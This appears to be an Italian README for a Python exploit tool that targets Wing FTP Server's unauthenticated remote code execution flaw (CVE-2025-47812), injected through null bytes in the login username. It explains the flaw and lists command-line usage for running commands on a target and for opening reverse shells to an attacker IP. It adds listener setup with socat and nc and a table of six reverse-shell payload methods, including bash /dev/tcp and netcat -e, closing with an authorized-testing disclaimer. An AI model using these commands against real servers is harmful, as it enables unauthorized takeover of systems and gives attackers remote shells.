
Exploit di remote code execution non autenticato per Wing FTP Server (CVE-2025-47812) con molteplici payload di reverse shell, modalità interattiva e CLI, e gestione automatica delle sessioni.
| Campo | Valore |
|---|---|
| CVE | CVE-2025-47812 |
| Versione interessata | Wing FTP Server < 7.4.4 |
| Tipo | Esecuzione remota di codice non autenticata |
| Punteggio CVSS | 10.0 (Critico) |
| Corretto in | Wing FTP Server 7.4.4 |
La vulnerabilità risiede nell'endpoint di login /loginok.html. Il server non riesce a sanificare i byte nulli (%00) nel campo username. Ciò consente a un attaccante di iniettare codice Lua arbitrario nei file di sessione, che vengono successivamente valutati lato server quando si accede a endpoint come /dir.html, senza alcuna autenticazione richiesta.
Riferimento: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
--payload-o--timeout e --delay configurabili-vCtrl+Cpip install requests
python3 wingftp_rce_exploit.py
# Esegui un comando
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"
# Salva l'output in un file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt
# Reverse shell (prova tutti i payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444
# Reverse shell (payload specifico)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat
-u / --url URL di base del target
-U / --username Nome utente di login (default: anonymous)
-c / --command Comando da eseguire (modalità comando)
-r / --rhost IP del tuo listener (modalità reverse shell)
-p / --rport Porta del tuo listener (modalità reverse shell)
--payload Payload specifico da usare (vedi elenco sotto)
--timeout Timeout della richiesta HTTP in secondi (default: 10)
--delay Ritardo tra tentativi di payload in secondi (default: 4)
-o / --output Salva l'output del comando in un file
-v / --verbose Abilita output di debug
URL di destinazione : http://192.168.1.10:5466
Nome utente : anonymous
Scelta : 1
Comando : whoami
Passo 1 — Avvia il tuo listener (socat consigliato per TTY completo):
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr
O con nc:
nc -lvnp 4444
Passo 2 — Esegui l'exploit:
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444
Questo strumento è destinato esclusivamente a scopi educativi e a test di sicurezza autorizzati.
NON utilizzarlo contro sistemi di cui non possiedi o non hai esplicita autorizzazione scritta per testare.
L'uso non autorizzato è illegale. Gli autori non si assumono alcuna responsabilità per un uso improprio.
| Nome | Metodo |
|---|
socat | PTY completo tramite socat |
bash | Redirect /dev/tcp |
python3 | Subprocess socket |
nc-e | Netcat con flag -e |
nc-fifo | Netcat + mkfifo |
php | PHP fsockopen |